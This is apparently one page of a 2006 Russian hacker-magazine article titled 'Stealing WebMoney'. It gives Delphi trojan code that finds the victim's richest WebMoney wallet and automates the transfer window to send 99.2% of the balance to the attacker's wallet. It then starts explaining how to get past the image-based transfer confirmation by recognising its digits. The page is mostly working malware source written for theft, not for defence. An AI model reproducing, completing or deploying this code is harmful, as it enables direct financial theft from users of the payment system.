Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР #90, ИЮНЬ 2006 г.

Уводим WebMoney

SIR (sir-xaker@mail.ru)

Хакер, номер #090, стр. 090-116-3


GetLocaleFormatSettings(LANG_SYSTEM_DEFAULT,format);

format.DecimalSeparator:='.';

Теперь мы будем искать кошелек, на котором больше всего денег.

Ищем самый толстый кошелек

var

ind:integer;

koef,max:real;

ind:=0; max:=0.0;

for i:=1 to stop do begin

case Kosh[i].RZUE of

'R': koef:=1.0;

'Z': koef:=27.2;

'E': koef:=34.2;

'U': koef:=5.3;

else koef:=0.0;

end;

if max<Kosh[i].Sum*koef then begin

max:=Kosh[i].Sum*koef;

ind:=i;

end;

end;

Тут мы приводим всю валюту к WMR путем умножения на их курсы и ищем максимальное значение. Если после выполнения кода в ind записано 0, то у юзера не будет денег ни в одном кошельке.

Ну вот, теперь заполняем все поля окна перевода.

Заполняем поля в окне "Передать WM"

for i:=1 to (stop-ind) do begin

PostMessage(TransWnd[1],WM_KEYDOWN,VK_UP,0);

PostMessage(TransWnd[1],WM_KEYUP,VK_UP,0);

end;

SendMessage(TransWnd[3],WM_SETTEXT,0,LongInt(PChar('[Твой WM кошелек]')));

SendMessage(TransWnd[2],WM_SETTEXT,0,LongInt(PChar(FloatToStr(0.992*Kosh[ind].Sum))));

SendMessage(TransWnd[4],WM_SETTEXT,0,LongInt(PChar('В Мировой фонд хакеров!')));

PostMessage(TransWnd[8],WM_KEYDOWN,VK_RETURN,0);

PostMessage(TransWnd[8],WM_KEYUP,VK_RETURN,0);

Ну что же, перейдем к более сложной части нашего повествования

Распознавание

Если ты уже когда-нибудь пользовался программой WM, то должен был еще в самом начале задаться вопросом: как же обойти подтверждение перевода, ведь там необходимо вводить трехзначное число из картинки!? Мой ответ – никак! Моих знаний ассемблера недостаточно, чтобы проигнорировать эту процедуру. Поэтому придется тупо распознавать эти три меняющиеся в размере цифры. Вообще-то, это отдельная статья, и если кто-нибудь меня хорошо попросит, я могу и о ней написать, так как в инете про это, увы, ничего не сказано. (Именно про алгоритм можно почитать тут - http://www.xakep.ru/magazine/xa/073/120/1.asp - прим. редактора).

Сначала разберемся, что за цифры мы имеем: эта цветная картинка, без рамки имеет размер 46x18 пикселей. Всего три цифры. Первая цифра может принимать два положения — среднее и большое, вторая - среднее и маленькое, третья - среднее, большое, маленькое и наклонное. Но они всегда располагаются в одном и том же месте. Правда, размер окна и положение самой картинки не всегда одинаков (однако всегда неизменным остается ее положение по отношению к нижнему левому краю).

Назад на стр. 090-116-2  Содержание  Вперед на стр. 090-116-4
Hosted by uCoz